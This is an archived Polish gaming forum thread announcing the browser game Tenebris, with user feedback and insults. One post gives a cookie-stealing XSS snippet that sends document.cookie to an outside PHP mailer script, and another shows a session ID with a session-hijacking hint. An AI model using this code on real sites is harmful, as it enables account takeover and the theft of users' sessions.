Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Zapowiedź] Tenebris - Era Cieni

kamvader

Rekomendowane odpowiedzi

Opublikowano

Zarejestrowałem się do gry , nie wygląda źle... tylko wszystko wygląda ( bez obrazy ) na odpierdo* się, o czym mowa ;>? strona : ponura , brak kolorów , jeden dominujący.. czerń , i zmieniłbym to : np. wchodzę w zadania i pokazuje się Samouczek.. oczywiście na czarnym tle... strona główna jest fatalna co zniechęca graczy do gry... chodzi mi o samą grafike , myślę że pozmieniacie kilka rzeczy :D

Pomogłem ;>? Proszę Like !:)To nic nie kosztuje :(

Proszę administracje o zdjęcie kilku procent :(

• Odpowiedzi 230
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Bo gra jest na prawdę spoko , ale jakby było jakieś forum to bym wam napisał co mi się nie podoba jako graczowi :D

Opublikowano

Jesteś pewny że ten magiczny proszek ulepsza przedmiot ?

"Magiczny Proszek służy do ulepszania przedmiotów, nadaje on im magiczne własności."

czy może go pogarsza , do broni weszedł mi bon " obrona + - 15% "

Super ulepszenie tego w grach jeszcze nie widziałem :D

9adc2b66942ff0dffh1.gif

Serwer TerraVix [survival + PvP] IP: 188.165.22.154 Port: 8110

Opublikowano

Wiecie co..?

Myślałem, że rejestrując się na tym forum porozmawiam z "ludźmi"..

Co Wy chcecie kiedyś programować? Być kimś, mieć dobrą szkołę, pracę?

Czy będziecie się w przyszłości kłócić kto jest "chujem" za przeproszeniem?

Ogarnijcie się!

To zapowiedź a nie targ w piątek!

Hej,rozumiem Cię ,ale czy pozwoliłbyś ,gdyby ktoś wyzywał Ciebie lub Twoich kolegów/rodzine wyzywał od ***** ?

Pozwoliłbyś sobie na to ,żeby ***** ****** ******* mówił Ci ,że nic nie umiesz a Ty się starasz latami ?

Oke co do gry :

- Mam wrodzony hejting do gotowców

- Ranking gildii się rozjeżdża

- O zabezpieczeniach nie wspomne

Mówi Ci to coś ^.- ?

PHPSESSID=53f2df4f2dd182a11d3b35399832ed25

HTTP LIVE HEADERS ,podmieniamy zawartość sesji i witaj konto administratora.

Przyjmuje zlecenia dot. web masterki.

while(!$success){
....try();
}

Opublikowano

Ey kurwa od tomka wypierdalaj ,bo to świetny grafik.

Ile Ci zapłacili żebyś pozytywnie ocenił silnik dobry rycerz w wydaniu tenebris ?

Are you fucking kidding me?

Grafik? Zabawne..

Porównaj jego prace do prac PRAWDZIWEGO GRAFIKA np. Zielska, samborka, aziz natour.

@up tak, poproś administratora o link, albo zgaduj hash.

Tak czy siak, slaby pomysl z trzymaniem hashu w linku. Trzeba brac pod uwage ze jakis gm to osiol i rzuca linkami na prawo i lewo.

Opublikowano

Are you fucking kidding me?

Grafik? Zabawne..

Porównaj jego prace do prac PRAWDZIWEGO GRAFIKA np. Zielska, samborka, aziz natour.

Czego ty oczekujesz od 16latka, który nawet nie chodzi do żadnego TIMu? Poza tym odwołujesz do jakichś prac araba uważasz je za super wyjątkowe?. Podobne robię średnio co 2 tygodnie.

tumblr_inline_nt05diSJ3v1r02w2j_500.gif

Opublikowano

UP2@

Nie,nie zabawne.

To nie jest hash md5 (próbuj rozkodować,śmiało )

Atak typu XSS

while(!$success){
....try();
}

Opublikowano

UP2@

Nie,nie zabawne.

To nie jest hash md5 (próbuj rozkodować,śmiało )

Atak typu XSS

Prawie każda strona ma PHPSESSID wiec nic ci to nie daje, jak byś dostał się na konto "admina" to wiedział byś, że tam nic nie ma i jest to zwykłe konto. A jeżeli się mylę i znasz sposób na dostanie się do konta to go podaj. Nie do końca jestem pewny ale PHPSESSID jest generowany za każdym razem inny i jeżeli przeniesiesz go na inną przeglądarkę to nie zadziała(ale to chyba też zależy od hostingu). To co ty podałeś nie działa i nie daje żadnego dostępu. I jest jeszcze pytanie w jaki sposób zamierzasz zdobyć/zdobyłeś phpsessid admina. Proszę popraw mnie jeżeli coś źle pisze. Są jakieś luki ktore pozwolą ci umieścić kod wykradający??

Opublikowano

Konto admina jest normalne więc czuj się rozczarowany ;] Tak jak mówi czituz. Jak rzeczywiście coś jest niezabezpieczone to chętnie przyjmę zgłoszenie ;) Konto admina stworzone jest tylko i wyłącznie do obserwacji gry. I niedługo pare bajerów typu blokada ataku dodam.

WymianaSMS.pl - wymień smsy na kupony paysafecard, steam lub doładowania telefoniczne!

Opublikowano

up@ oke Kradzież czyiś cookies :

Ten post ma wyłączenie cele edukacyjny. Nie ponosze szkód które może wyrządzić osoba która go uzyje

Zakładamy strone na darmowym hostingu np. fwl.pl

+/- kod pliczku

<? mail('twoj@mail','Ciastko , karmel,czekoladka',$cookies); ?>

Wbijamy linijeczke kodu do formularzyku :

<script>
window.open("http://www.twojastrona.fwl.pl/ciastko.php?cos="+document.cookie);
</script>

Jeżeli kampimy na mailu to mamy % szans na przechwycenie sesji :)

Ps. W przyszłosci ,gdy będziesz miał bardziej "rozbudowaną" i popularniejszą gre to ... :<

while(!$success){
....try();
}

Opublikowano

Tak jak myślałem ktoś musi wejść na spreparowaną stronę bo z tego co wiem to ten kod wklejony w komentarz albo wiadomość się nie uruchomi bo są w tym silniku zabezpieczenia. Mam jeszcze pytanie jak z tymi zabezpieczeniami phpsessid bo zdaje mi się, że teraz prawie wszystkie serwery mają włączone zabezpieczenie, że nie można przenosić tych sesji. Może ktoś kto się zna coś o tym powiedzieć??

Opublikowano

up@

a to nie jest temat do offtopu.To zapowiedź!

topic@

Zostało coś dodane do tenebris ?

while(!$success){
....try();
}

Opublikowano

Właśnie kodowany jest layout. Na ukończeniu jest system płatności sms. Zmienią się też raporty dostarczane do osoby która nie atakowała. Dodano walki gildyjne !

WymianaSMS.pl - wymień smsy na kupony paysafecard, steam lub doładowania telefoniczne!

Opublikowano

Gra jest fajna , lecz brakuje jej tej oryginalności , tego błysku... jest za dużo opcji moim zdaniem , zbędne jest aukcje , pozmieniać nazwy niektórych opcji, zając się kolorem strony, dopracować kilka rzeczy i gra będzie jak znalazł ;<

Ale to wszystko trzeba zrobić..

Opublikowano

No sam już nie wiem co dodać , ale dla mnie jest za mało błysku , takiej oryginalności :D!

Wesołych Świąt !!!!

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...